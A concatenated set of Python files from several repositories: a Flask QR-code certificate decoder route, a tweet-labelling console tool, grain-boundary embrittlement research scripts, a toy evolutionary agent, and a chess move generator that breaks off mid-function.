def get_locale():
    """Choose the UI language best matching the request's Accept-Language."""
    supported = app.config['LANGUAGES'].keys()
    return request.accept_languages.best_match(supported)
# Force HTTPS redirects only in production deployments.
if is_prod:
    sslify = SSLify(app)
@app.context_processor
def inject_user():
    """Expose deployment settings and app metadata to every template."""
    context = {
        'github_project': app.config['GITHUB_PROJECT'],
        'is_prod': is_prod,
        'ga_id': ga_id,
        'sharethis_script_src': sharethis_script_src,
        'app_url': app_url,
        'app_name': gettext('Green Pass COVID-19 QRCode Decoder'),
    }
    return context
@app.route('/', methods=['GET'])
def home():
    """Render the landing page with the upload form."""
    return render_template('home.html')
@app.route('/qrdata', methods=['GET', 'POST'])
def qrdata():
    """Decode an uploaded QR-code image and render the certificate data.

    GET requests are redirected to the home page. Bad uploads produce the
    matching error template (missing file/name -> 500, bad extension or
    undecodable image -> 400).
    """
    if request.method != 'POST':
        return redirect('/')
    # BUGFIX: request.files['image'] raised a KeyError (HTTP 400 with a
    # generic page) when the multipart field was absent; also removes the
    # redundant second filename check of the original.
    image = request.files.get('image')
    if image is None or image.filename == '':
        return render_template('error.html', error='UPLOAD_IMAGE_WITH_NO_NAME'), 500
    app.converted_schema = ''
    file_ext = splitext(image.filename)[1]
    if file_ext not in app.config['UPLOAD_EXTENSIONS']:
        return render_template('error.html', error='UPLOAD_EXTENSIONS_ERROR', file_ext=file_ext), 400
    try:
        decoder = greenpass_decoder(image.stream)
        return render_template('data.html', data=decoder.decode(app.config['DCC_SCHEMA']))
    except (ValueError, IndexError) as e:
        # Undecodable / non-QR images surface here.
        print(e)
        return render_template('error.html', error='UPLOAD_IMAGE_NOT_VALID'), 400
kaustavbhattacharjee/labeling | refs/heads/main | # This is a sample Python script.
# Press ⌃R to execute it or replace it with your code.
# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.
from utils import Tweet
def print_hi(name):
    """Print a greeting for ``name`` (PyCharm sample scaffold)."""
    greeting = f'Hi, {name}'
    print(greeting)
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
    print_hi('Start Labeling')
    # See PyCharm help at https://www.jetbrains.com/help/pycharm/
    # Labeling pipeline: load the CSV, prompt for a label per unlabeled row,
    # then write the labels back to the same file.
    #PATH = "Jun/test.csv"
    PATH = "Kebby/MarchNonExpertsManualLabel3.csv" #first save the .xlsx file as .csv
    tweet = Tweet()
    tweets = tweet.import_data(PATH, "csv")
    tweets_labeled = tweet.create_labels(tweets)
    tweet.save_labels(tweets_labeled, PATH, "csv", index=False)
| Python | 23 | 34.217392 | 94 | /main.py | 0.714815 | 0.712346 |
kaustavbhattacharjee/labeling | refs/heads/main | import pandas as pd
import csv
import os
from pandas import ExcelWriter
class Tweet:
    """Interactive manual labeling of tweets stored in a spreadsheet."""
    def import_data(self, PATH, type):
        """Load the labeling sheet from ``PATH``.

        :param PATH: path to the spreadsheet
        :param type: "xlsx" or "csv"
        :return: pandas DataFrame with the sheet contents

        NOTE(review): any other ``type`` value raises UnboundLocalError on
        the return — consider validating the argument.
        """
        if type == "xlsx":
            xl = pd.ExcelFile(PATH)
            data = xl.parse("Sheet1")
        if type == "csv":
            data = pd.read_csv(PATH)
        return data
    def label_key2char(self, key):
        """
        :param key: the input 0,1,2 from keyboard
        :return: "fact", "opinion", "misinformation"; empty string otherwise
        """
        if key == "0":
            return "fact"
        elif key == "1":
            return "opinion"
        elif key == "2":
            return "misinformation"
        else:
            return ""
    def create_labels(self, df):
        """Prompt the user for a label on every row still missing one.

        :param df: imported data in dataframe format
        :return: dataframe with added label in ManualLabel column
        """
        labels = df["ManualLabel"].tolist()
        for index, row in df.iterrows():
            # Only rows without an existing manual label are shown.
            if pd.isna(row["ManualLabel"]):
                print("===========")
                print("Tweet Text")
                print(row["Tweet Text"])
                print("===========")
                print("Row Number: "+ str(index))
                print("Subjective: " + str(row["SubjectivityScores"]))
                print("Sentiment: " + str(row["FlairSentimentScore"]) + " " + str(row["FlairSentiment"]))
                print("===========")
                print('Classify as fact(0), opinion(1), misinformation(2) OR Skip(s), Quit(q): ')
                print("Your Label:")
                # Single raw keypress, no Enter required.
                getch = _Getch()
                label = getch()
                label_char = self.label_key2char(label)
                # Clear the console between tweets (Windows vs POSIX).
                os.system('cls' if os.name == 'nt' else 'clear')
                if label == "q":
                    break  # stop labeling; keep what was entered so far
                labels[index] = label_char
            else:
                continue
        # Replace the column so partially-entered labels are preserved.
        df.drop(columns=["ManualLabel"], inplace=True)
        df["ManualLabel"] = labels
        return df
    def save_labels(self, tweets_labeled, PATH, type, index):
        """Write the labeled dataframe back to ``PATH`` as xlsx or csv."""
        df = tweets_labeled
        if type == "xlsx":
            writer = ExcelWriter(PATH)
            df.to_excel(writer, 'Sheet1', index=index)
            writer.save()
        if type == "csv":
            df.to_csv(PATH, index=index)
class _Getch:
    """Gets a single character from standard input. Does not echo to the
    screen."""
    def __init__(self):
        # Probe for Windows first; fall back to the Unix implementation
        # when msvcrt is unavailable.
        try:
            self.impl = _GetchWindows()
        except ImportError:
            self.impl = _GetchUnix()
    def __call__(self): return self.impl()
class _GetchUnix:
    """Read one raw keypress from stdin on POSIX terminals."""
    def __init__(self):
        # Imported here only to fail fast (ImportError) on platforms
        # without tty support; the names are not otherwise used.
        import tty, sys
    def __call__(self):
        import sys, tty, termios
        fd = sys.stdin.fileno()
        old_settings = termios.tcgetattr(fd)
        try:
            # Raw mode: deliver the keypress immediately, without echo.
            tty.setraw(sys.stdin.fileno())
            ch = sys.stdin.read(1)
        finally:
            # Always restore the previous terminal settings.
            termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
        return ch
class _GetchWindows:
    """Read one raw keypress on Windows via msvcrt."""
    def __init__(self):
        # Import probe: raises ImportError off-Windows, letting _Getch
        # fall back to the Unix implementation.
        import msvcrt
    def __call__(self):
        import msvcrt
        return msvcrt.getch()
| Python | 110 | 28.799999 | 105 | /utils.py | 0.494968 | 0.491613 |
dspearot/Embrittling-Estimator | refs/heads/main | # ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# This code is a supplement for the journal article titled:
# "Spectrum of Embrittling Potencies and Relation to Properties of
# Symmetric-Tilt Grain Boundaries"
# ------------------
# This code performs the following tasks:
# 1) Obtains density of states from the previous step
# 2) Calculates Xi and Pi (check the paper for definitions) at the population
# level (Fig.4)
# 3) Write Xi and Pi calculated in this step to a data frame, to be processed
# at the sample level
# --- Definitions and Abbreviations --
# GB: Grain boundary
# FS: Free surface
# ------------------
# Authors: Doruk Aksoy (1), Rémi Dingreville (2), Douglas E. Spearot (1,*)
# (1) University of Florida, Gainesville, FL, USA
# (2) Center for Integrated Nanotechnologies, Sandia National Laboratories,
# Albuquerque, NM, USA
# (*) dspearot@ufl.edu
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
#%% Imports
import numpy as np
import pandas as pd
# %% Define functions
def calcXtot(delta_E_seg_GB_i,Fi,X_bulk):
    '''
    Calculate total solute concentration from bulk solute concentration.

    Uses the module-level constants kB (Boltzmann constant), T (temperature)
    and f_int (fraction of interface sites).

    Parameters
    ----------
    delta_E_seg_GB_i : All segregation energies for each site type i
    Fi : Density of states for each site type within the population
    X_bulk : Bulk solute concentration

    Returns
    -------
    X_tot : Total solute concentration within the population
    '''
    # Occupation probability of each site type at the given bulk
    # concentration, evaluated for all site types at once instead of the
    # previous Python-level loop (identical values, vectorized).
    Xi_with_bulk = 1.0 / (1.0 + ((1 - X_bulk) / X_bulk) * np.exp(delta_E_seg_GB_i / (kB * T)))
    # Calculate the effective solute concentration
    X_bar = np.sum(Fi * Xi_with_bulk)
    # Return the total solute concentration
    return ((1 - f_int) * X_bulk + f_int * X_bar)
def fromXtotToXbulk(delta_E_seg_GB_i,Fi,X_tot,tol):
    '''
    Calculate bulk solute concentration from total solute concentration
    using a midpoint (bisection-style) trial-and-improvement solver.

    Parameters
    ----------
    delta_E_seg_GB_i : All segregation energies for each site type i
    Fi : Density of states for each site type
    X_tot : Total solute concentration
    tol : Tolerance

    Returns
    -------
    The bulk concentration if found within 100 iterations, otherwise 0.
    '''
    # Bracket the solution between zero and twice the total concentration.
    lower = 0.0
    upper = X_tot * 2
    guess = (lower + upper) / 2
    trial = calcXtot(delta_E_seg_GB_i, Fi, guess)
    max_iter = 100
    iterations = 0
    # Shrink the bracket towards the target until within tolerance.
    while (np.abs(trial - X_tot) > tol) and (iterations < max_iter):
        if trial > X_tot:
            upper = guess
        else:
            lower = guess
        guess = (upper + lower) / 2
        trial = calcXtot(delta_E_seg_GB_i, Fi, guess)
        iterations += 1
    if iterations == max_iter:
        print("Could not find a value.")
        return (0)
    return (guess)
def calcPopProp(delta_E_seg_GB_i,Fi,X_tot):
    '''
    Calculate population properties.

    Parameters
    ----------
    delta_E_seg_GB_i : All segregation energies for each site type i
    Fi : Density of states for each site type
    X_tot : Total solute concentration

    Returns
    -------
    X_bulk : Bulk solute concentration
    Xi : Fraction of occupied type i sites
    Pi : Solute occupancy density
    X_bar : Effective solute concentration
    delta_E_bar_seg_GB_i : Effective segregation energy per site type i
    delta_E_bar_seg_GB : Total effective segregation energy
    '''
    # Calculate the bulk concentration using fromXtotToXbulk function
    X_bulk = fromXtotToXbulk(delta_E_seg_GB_i,Fi,X_tot,1E-4)
    # Raise an exception if a bulk solute concentration cannot be calculated
    if (X_bulk==0):
        raise Exception('Error: Cannot calculate a bulk solute concentration with given total solute concentration.')
    # Fraction of occupied type-i sites, vectorized over all site types
    # instead of the previous list comprehension (identical values).
    Xi = 1.0 / (1.0 + ((1 - X_bulk) / X_bulk) * np.exp(delta_E_seg_GB_i / (kB * T)))
    # Site occupancy
    Pi = Fi * Xi
    # Effective solute concentration
    X_bar = np.sum(Pi)
    # Effective segregation energy for each site type i
    delta_E_bar_seg_GB_i = (1/(X_bar*(1-X_bar))) * (Fi * delta_E_seg_GB_i * Xi * (1-Xi))
    # Effective segregation energy
    delta_E_bar_seg_GB = np.sum(delta_E_bar_seg_GB_i)
    # Return all calculated properties
    return (X_bulk,Xi,Pi,X_bar,delta_E_bar_seg_GB_i,delta_E_bar_seg_GB)
# %% MAIN
# Read-in normalized density of states (Format: Index/Energies/Frequencies)
df_Fi_GB = pd.read_csv("../Results/Fi_GB.csv",index_col = 0)
# Segregation energies for each site type i
delta_E_seg_GB_i = np.array(df_Fi_GB['Energy'])
# Density of states
Fi = np.array(df_Fi_GB['Freq'])
# %% Variables (these module-level constants are read by calcXtot/calcPopProp)
# Total solute concentration
X_tot = 15/100 # no of solute atoms/no of GB atoms
# Fraction of interface sites to all segregation sites
f_int = 0.162
# Boltzmann Constant in eV K-1
kB = 0.00008617333262
# Temperature
T = 300 # K
# %% Calculate properties corresponding to the GB population using calcPopProp function
(X_bulk,Xi,Pi,X_bar,delta_E_bar_seg_GB_i,delta_E_bar_seg_GB) = calcPopProp(delta_E_seg_GB_i,Fi,X_tot)
# %% Create a data frame with the population properties
df_Pop = pd.DataFrame(np.transpose([delta_E_seg_GB_i, Fi, Xi, Pi]),columns=['delta_E_seg_GB_i','Fi','Xi','Pi']).astype(float)
# Convert data frame to csv (consumed by the sample-level script)
df_Pop.to_csv("../Results/Pop.csv")
| Python | 167 | 36.946106 | 127 | /Scripts/Population.py | 0.61147 | 0.6004 |
dspearot/Embrittling-Estimator | refs/heads/main | # ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# This code is a supplement for the journal article titled:
# "Spectrum of Embrittling Potencies and Relation to Properties of
# Symmetric-Tilt Grain Boundaries"
# ------------------
# This code performs the following tasks:
# 1) Reads in Fi, Xi, Pi from the previous step
# 2) Calculates site-specific properties that are shown in Table 2 and Fig. 6
# 3) Calculates collective-behavior properties that are shown in Table 3 and Fig. 5
# 4) Generates all data frames for plotting
# --- Definitions and Abbreviations --
# GB: Grain boundary
# FS: Free surface
# ------------------
# Authors: Doruk Aksoy (1), Rémi Dingreville (2), Douglas E. Spearot (1,*)
# (1) University of Florida, Gainesville, FL, USA
# (2) Center for Integrated Nanotechnologies, Sandia National Laboratories,
# Albuquerque, NM, USA
# (*) dspearot@ufl.edu
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
#%% Imports
import numpy as np
import pandas as pd
from os import listdir,path
# %% Define functions
def getNumOfAtoms(file_path, file_name):
    '''
    Obtain number of atoms from the file.

    The file is assumed to contain one header line followed by one line
    per atom.

    Parameters
    ----------
    file_path : File path
    file_name : Name of the file

    Returns
    -------
    Number of atoms (line count minus the header line)
    '''
    with open(path.join(file_path, file_name), 'r') as atoms_file:
        # Count lines with a generator at C speed instead of an explicit
        # Python loop with a manual counter.
        line_count = sum(1 for _ in atoms_file)
    return line_count - 1
def getEnergies(file_path, file_name, arr):
    '''
    Read whitespace-separated numeric rows from a file into ``arr``.

    Lines containing '#' are treated as headers and skipped; data row k of
    the file (1-based, after the header) fills ``arr[k-1]``.

    Parameters
    ----------
    file_path : File path
    file_name : Name of the file
    arr : Array to write energies
    '''
    with open(path.join(file_path, file_name), 'r') as results_file:
        for row, line in enumerate(results_file):
            if "#" in line:
                continue  # header line
            for col, token in enumerate(line.split()):
                arr[row - 1, col] = token
def segEngOcc(energies,col_num,NDIGITS):
    '''
    Group segregation sites into unique "site types" by their rounded
    segregation energy, then recover the un-rounded representative energies.
    Parameters
    ----------
    energies : Energies obtained from simulations (2D array, one row per atom)
    col_num : Segregation energy column number
    NDIGITS : Number of digits to consider when looking at unique segregation
    energies
    Returns
    -------
    DE_seg_i_GB : Segregation energy of site type i (original, un-rounded value)
    N_hat_i_GB : Number of occurences of the segregation energy of site type i
    num_site_types : Total number of unique site types
    site_type_ind : Indices of matching energies between DE_seg_i_GB array and energies array
    '''
    # Round energies by the given number of digits, and then find number of unique energies and number of occurences
    # (np.nonzero keeps only rows whose segregation energy is non-zero, i.e.
    # sites that actually have a computed value).
    DE_seg_i_GB,N_hat_i_GB = np.unique(np.round(energies[np.nonzero(energies[:,col_num]),col_num],NDIGITS), return_counts=True)
    # Number of site types
    num_site_types = int(np.size(DE_seg_i_GB))
    # We will use the site_type_ind list to match the site types between GBs and FSs.
    site_type_ind = []
    # Now that we have matched the rounded energies, find originals and put back into DE_seg_i_GB array
    for i in range(num_site_types):
        # [1][0]: the fancy index above yields a 1xN view, so axis 1 holds the
        # site positions; take the first occurrence of each rounded value.
        site_type_ind.append(np.where(np.round(energies[np.nonzero(energies[:,col_num]),col_num],NDIGITS) == DE_seg_i_GB[i])[1][0])
        DE_seg_i_GB[i] = energies[site_type_ind[i],col_num]
    return (DE_seg_i_GB, N_hat_i_GB, num_site_types, site_type_ind)
# %% MAIN
# Read in data frames (site populations computed in the previous step)
df_Pop = pd.read_csv("../Results/Pop.csv",index_col = 0).astype(float)
# From data frame to arrays
delta_E_seg_GB_i = np.array(df_Pop['delta_E_seg_GB_i'])
Pi = np.array(df_Pop['Pi'])
# Round by this number when comparing energies
NDIGITS = 3
# Perform simulations for all given models; each subfolder of ../GBs/ is one
# sample, named "<tilt>_<normal>".
allSims = listdir('../GBs/')
# %% Create a data frame to store all results
# Define columns (three properties shown in Fig. 5)
columns_all = ["DE_hat_b","PR_hat_GB","E_hat_b"]
# Tilt and GB normals as indices of the data frame (parsed from folder names)
tilt_axes = [sim.split('_')[0] for sim in allSims]
GB_normals = [sim.split('_')[1] for sim in allSims]
# Levels required for a multi index data frame
levels_all = list(zip(*[tilt_axes, GB_normals]))
# Define indices
index_all = pd.MultiIndex.from_tuples(levels_all, names=['Tilt', 'Normal'])
# Initialize the data frame (values filled per sample in the loop below)
df_all = pd.DataFrame(index = index_all, columns=columns_all)
#%% For each sample
for indSim,sim in enumerate(allSims):
    # Obtain GB normal and tilt axes from the folder names ("<tilt>_<normal>")
    GB_normal = str(sim.split('_')[1])
    GB_tilt = str(sim.split('_')[0])
    # Model path
    model_path = path.join("../GBs/", str(sim) + "/")
    # Read in number of GB atoms considered in the simulation
    N_hat_GB = getNumOfAtoms(path.join(model_path, "Results/"),"GBEnergies.dat")
    # Initialize an array for energies of individual sites in GB models
    GBenergies = np.zeros((N_hat_GB,5))
    # Initialize an array for energies of individual sites in FS models
    FSenergies = np.zeros((N_hat_GB,5))
    try:
        # Read energies for each sample
        getEnergies(path.join(model_path, "Results/"),"GBEnergies.dat",GBenergies)
        getEnergies(path.join(model_path, "Results/"),"FSEnergies.dat",FSenergies)
        # Sort by atom ID
        GBenergies = GBenergies[np.argsort(GBenergies[:,0]),:]
        FSenergies = FSenergies[np.argsort(FSenergies[:,0]),:]
        # Weed out non-matching simulations (if one of two simulations per atom ID is failed)
        # Find out the intersection vector of two arrays, then delete rows with different atom IDs
        # NOTE(review): np.delete inside the loop shifts the remaining rows;
        # this assumes at most a few mismatches -- verify if failures are common.
        for ind,val in enumerate(np.asarray(np.intersect1d(GBenergies[:,0],FSenergies[:,0]),dtype=int)):
            if (not np.searchsorted(GBenergies[:,0],val) == ind):
                GBenergies = np.delete(GBenergies,ind,0)
            if (not np.searchsorted(FSenergies[:,0],val) == ind):
                FSenergies = np.delete(FSenergies,ind,0)
        # Update number of atoms
        N_hat_GB = np.size(GBenergies,axis=0)
        # Find unique segregation energies and their number of occurences using segEngOcc function
        DE_seg_i_GB, N_hat_i_GB, num_site_types_GB, site_type_ind_GB = segEngOcc(GBenergies,4,NDIGITS)
        # Site type indices should be preserved after cleavage (See Section 4)
        DE_seg_i_FS = FSenergies[site_type_ind_GB,4]
        # Embrittling potencies
        DE_b_i = GBenergies[site_type_ind_GB,4]-FSenergies[site_type_ind_GB,4]
        # Site occupancies
        P_bar_i_GB = np.zeros(num_site_types_GB)
        # Obtain P_bar_i_GB from the population (closest value)
        for i in range(num_site_types_GB): P_bar_i_GB[i] = Pi[(np.abs(delta_E_seg_GB_i - DE_seg_i_GB[i])).argmin()]
        # Rescaled site occupancy for each site type i
        PR_hat_i_GB = P_bar_i_GB/np.sum(np.multiply(P_bar_i_GB, N_hat_i_GB))
        # Site specific embrittling estimator
        E_hat_b_i = np.multiply(PR_hat_i_GB,DE_b_i)
        # Sample embrittling estimator
        E_hat_b = np.sum(np.multiply(np.multiply(PR_hat_i_GB,N_hat_i_GB),DE_b_i))/(N_hat_GB)
        # Write properties to the all results data frame.
        # FIX: use .loc with a full (row, column) label instead of chained
        # indexing (df[col][row] = ...), which pandas may apply to a temporary
        # copy and silently drop.
        df_all.loc[(GB_tilt, GB_normal), 'DE_hat_b'] = np.sum(np.mean(np.multiply(DE_b_i,N_hat_i_GB)))/N_hat_GB
        df_all.loc[(GB_tilt, GB_normal), 'PR_hat_GB'] = np.sum(np.mean(np.multiply(PR_hat_i_GB,N_hat_i_GB)))/N_hat_GB
        df_all.loc[(GB_tilt, GB_normal), 'E_hat_b'] = E_hat_b
    except Exception as err:
        # FIX: a bare `except:` also swallowed SystemExit/KeyboardInterrupt;
        # catch Exception and report the cause of the failure.
        print(indSim+1,sim,"Properties not calculated!",err)
        continue
# %% To csv
df_all.to_csv("../Results/AllResults.csv") | Python | 197 | 38.568527 | 131 | /Scripts/Samples.py | 0.60801 | 0.602503 |
codingconnor112/Max | refs/heads/main | import copy
import pickle
import random
import sys
print(" Max testing intellegence")
print("a simple AI simulation")
print("made with python version "+sys.version)
# Load the training dictionary {number: is_big_label} written by rantest.py.
file = open(r"test.info", mode = "rb")
try:
    testdict = pickle.load(file)
except EOFError:
    # NOTE(review): if test.info is empty, testdict is never bound and the
    # later list(testdict.keys()) raises NameError -- confirm intended.
    pass
file.close()
# `global` at module level is a no-op; agentnum is simply a module global
# read by Agent.reproduce().
global agentnum
agentnum = int(input("agents for MAX"))
class Agent(object):
    """A threshold classifier: answers True for inputs whose rounded value
    is at least `lineval`. Evolved by score-based selection and +/-1
    threshold mutation."""
    def __init__(self, lineval):
        # Decision threshold; mutated during reproduction.
        self.lineval = lineval
        # Number of correct answers on the most recent test run.
        self.score = 0
    def test(self, testsheet):
        """Return one boolean per value: True where round(value) >= threshold."""
        return [round(x) >= self.lineval for x in testsheet]
    def reproduce(self, other):
        """If this agent holds the (first) highest score in the population
        `other`, return a fresh population of `agentnum` agents: agentnum-1
        mutated copies of this agent plus this agent itself (last element).
        Otherwise return []. Relies on the module-level global `agentnum`.
        """
        scores = [agent.score for agent in other]
        if scores.index(max(scores)) != other.index(self):
            return []
        agentsnew = []
        for _ in range(agentnum - 1):
            child = copy.copy(self)
            # BUGFIX: the original indexed agentsnew[len(agentsnew-1)],
            # which is a TypeError (list minus int); mutate the child
            # directly before appending instead.
            child.lineval += random.randint(-1, 1)
            agentsnew.append(child)
        agentsnew.append(self)
        return agentsnew
iternum = int(input("iteration count"))
# Questions are the numbers, answers the is-big labels from rantest.py.
testque = list(testdict.keys())
testans = list(testdict.values())
# Start from three agents with random thresholds.
agents=[Agent(random.randint(0, 100)), Agent(random.randint(0, 100)), Agent(random.randint(0, 100))]
for z in agents:
    print(z.lineval)
for x in range(0, iternum):
    # Score every agent against the full test sheet.
    for i in agents:
        right = 0
        testresults = i.test(testque)
        for j in testresults:
            # NOTE(review): testresults.index(j) finds the FIRST position
            # holding the boolean value j, not the current position, so
            # answers are compared against the wrong questions; likely
            # intended: `for idx, j in enumerate(testresults)` -- confirm.
            if j == testans[testresults.index(j)]:
                right += 1
        i.score = right
    # NOTE(review): this loop reuses `i` (the last agent of the scoring
    # loop) instead of `y`, so reproduce() is invoked len(agents) times on
    # the same agent -- confirm intended.
    for y in agents:
        r = i.reproduce(agents)
        if len(r) != 0:
            print("iteration "+str(x+1)+" sucessful")
            agents = r
for nz in agents:
    print(nz.lineval)
print("done")
# Interactive demo: classify user-supplied numbers with a random agent.
while True:
    hinputnum = int(input("number"))
    if random.choice(agents).lineval >= hinputnum:
        print("small number")
    else:
        print("big number")
| Python | 73 | 27.589041 | 100 | /MAX.py | 0.563967 | 0.552947 |
codingconnor112/Max | refs/heads/main | import pickle, random
# Build a labelled sample set: 10 random numbers, each tagged by the user as
# "big" (answer 1) or not (answer 0), pickled to test.info for MAX.py.
dic = {}
for _ in range(10):
    randomnum = random.randint(0, 100)
    print(randomnum)
    # BUGFIX: bool(input(...)) was True for ANY non-empty answer, including
    # the literal "0"; interpret the "1/0" prompt literally instead.
    dic[randomnum] = input("1/0 big ").strip() == "1"
with open("test.info", "wb") as t:
    # "wb" already truncates; the context manager guarantees close().
    pickle.dump(dic, t)
| Python | 10 | 21.5 | 42 | /rantest.py | 0.648889 | 0.604444 |
ClaartjeBarkhof/ZoekenSturenBewegen | refs/heads/master | from __future__ import print_function
from copy import deepcopy
import sys
## Helper functions
# Translate a position in chess notation to x,y-coordinates
# Example: c3 corresponds to (2,5)
def to_coordinate(notation):
    """Map chess notation such as 'c3' onto 0-based (x, y) array indices."""
    file_index = ord(notation[0]) - ord('a')
    rank_index = 8 - int(notation[1])
    return (file_index, rank_index)
# Translate a position in x,y-coordinates to chess notation
# Example: (2,5) corresponds to c3
def to_notation(coordinates):
    """Map 0-based (x, y) array indices back to chess notation like 'c3'."""
    (x, y) = coordinates
    return chr(ord('a') + x) + str(8 - y)
# Translates two x,y-coordinates into a chess move notation
# Example: (1,4) and (2,3) will become b4c5
def to_move(from_coord, to_coord):
    """Join two coordinate pairs into one move string such as 'b4c5'."""
    return "".join((to_notation(from_coord), to_notation(to_coord)))
## Defining board states
# These Static classes are used as enums for:
# - Material.Rook
# - Material.King
# - Material.Pawn
# - Side.White
# - Side.Black
class Material:
    """One-letter codes for the piece types."""
    Rook = 'r'
    King = 'k'
    Pawn = 'p'
    Queen = 'q'
    Horse = 'h'
class Side:
    """Numeric codes for the two players."""
    White = 0
    Black = 1
# A chesspiece on the board is specified by the side it belongs to and the type
# of the chesspiece
class Piece:
    """A chess piece: a Side value plus a Material type code."""
    def __init__(self, side, material):
        # Side.White or Side.Black
        self.side = side
        # One of the Material single-character codes
        self.material = material
# A chess configuration is specified by whose turn it is and a 2d array
# with all the pieces on the board
class ChessBoard:
    def __init__(self, turn):
        # This variable is either equal to Side.White or Side.Black
        self.turn = turn
        # 8x8 list-of-lists of Piece objects (None for empty squares);
        # populated later via set_board_matrix or load_from_input.
        self.board_matrix = None
    ## Getter and setter methods
    def set_board_matrix(self, board_matrix):
        self.board_matrix = board_matrix
    # Note: assumes the position is valid
    def get_boardpiece(self, position):
        # position is an (x, y) pair; the matrix is indexed row (y) first.
        (x, y) = position
        return self.board_matrix[y][x]
    # Note: assumes the position is valid
    def set_boardpiece(self, position, piece):
        (x, y) = position
        self.board_matrix[y][x] = piece
    # Read in the board_matrix using an input string
    def load_from_input(self, input_str):
        """Parse a textual board: 8 rows of 8 characters ('.' = empty,
        letters = pieces, uppercase = White), followed by a 'W' or 'B'
        character stating whose turn it is."""
        self.board_matrix = [[None for _ in range(8)] for _ in range(8)]
        x = 0
        y = 0
        for char in input_str:
            # After the 8 board rows, the next character gives the turn.
            if y == 8:
                if char == 'W':
                    self.turn = Side.White
                elif char == 'B':
                    self.turn = Side.Black
                return
            # Tolerate Windows line endings.
            if char == '\r':
                continue
            # '.' is an empty square.
            if char == '.':
                x += 1
                continue
            # Newline advances to the next board row.
            if char == '\n':
                x = 0
                y += 1
                continue
            # Uppercase letters are White pieces, lowercase are Black.
            if char.isupper():
                side = Side.White
            else:
                side = Side.Black
            material = char.lower()
            piece = Piece(side, material)
            self.set_boardpiece((x, y), piece)
            x += 1
    # Print the current board state
    def __str__(self):
        """Render the board as ASCII: files a-h across, ranks 8-1 down,
        '.' for empty squares, uppercase letters for White pieces."""
        return_str = ""
        return_str += "  abcdefgh\n\n"
        y = 8
        for board_row in self.board_matrix:
            return_str += str(y) + "  "
            for piece in board_row:
                if piece == None:
                    return_str += "."
                else:
                    char = piece.material
                    # White pieces print in uppercase.
                    if piece.side == Side.White:
                        char = char.upper()
                    return_str += char
            return_str += '\n'
            # Rank labels count down from 8 (row 0 is rank 8).
            y -= 1
        turn_name = ("White" if self.turn == Side.White else "Black")
        return_str += "It is " + turn_name + "'s turn\n"
        return return_str
# Given a move string in chess notation, return a new ChessBoard object
# with the new board situation
# Note: this method assumes the move suggested is a valid, legal move
def make_move(self, move_str):
start_pos = to_coordinate(move_str[0:2])
end_pos = to_coordinate(move_str[2:4])
if self.turn == Side.White:
turn = Side.Black
else:
turn = Side.White
# Duplicate the current board_matrix
new_matrix = [row[:] for row in self.board_matrix]
# Create a new chessboard object
new_board = ChessBoard(turn)
new_board.set_board_matrix(new_matrix)
# Carry out the move in the new chessboard object
piece = new_board.get_boardpiece(start_pos)
new_board.set_boardpiece(end_pos, piece)
new_board.set_boardpiece(start_pos, None)
return new_board
def is_king_dead(self, side):
seen_king = False
for x in range(8):
for y in range(8):
piece = self.get_boardpiece((x, y))
if piece != None and piece.side == side and \
piece.material == Material.King:
seen_king = True
return not seen_king
# This function should return, given the current board configuation and
# which players turn it is, all the moves possible for that player
# It should return these moves as a list of move strings, e.g.
# [c2c3, d4e5, f4f8]
# TODO: write an implementation for this function
def legal_moves(self):
lower_bound = 0
upper_bound = 8
turn = self.turn
total_moves = []
for y in range(lower_bound, upper_bound):
for x in range(lower_bound, upper_bound):
location = (x, y)
piece = self.get_boardpiece(location)
if piece == None:
continue
else:
if piece.side == turn:
material = piece.material
if material == Material.Pawn:
move = self.pawn_move(turn, location)
if move != []:
total_moves.extend(move)
if material == Material.Rook:
moves = self.rook_move(turn, location)
if moves != []:
total_moves.extend(moves)
if material == Material.King:
moves = self.king_move(turn, location)
if moves != []:
total_moves.extend(moves)
if material == Material.Queen:
moves = self.queen_move(turn, location)
if moves != []:
total_moves.extend(moves)
if material == Material.Horse:
moves = self.horse_move(turn, location)
if move != []:
total_moves.extend(moves)
total_moves = self.translate_coordinates(total_moves)
# print(total_moves)
return total_moves
def horse_move(self, turn, location_1):
moves = []
x = location_1[0]
y = location_1[1]
if y > 1:
y1 = y - 2
if x != 0:
x1 = x - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x != 8:
x1 = x + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if y < 6:
y1 = y + 2
if x != 0:
x1 = x - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x != 8:
x1 = x + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x > 1:
x1 = x - 2
if y != 0:
y1 = y - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if y != 8:
y1 = y + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x < 6:
x1 = x + 2
if y != 0:
y1 = y - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if y != 8:
y1 = y + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
return moves
def queen_move(self, turn, location_1):
moves = []
location_2 = list(location_1)
rook_moves = self.rook_move(turn, location_1)
moves.extend(rook_moves)
while location_2[0] != 7 and location_2[1] != 0:
location_2[0] += 1
location_2[1] -= 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[0] != 7 and location_2[1] != 7:
location_2[0] += 1
location_2[1] += 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[0] != 0 and location_2[1] != 7:
location_2[0] -= 1
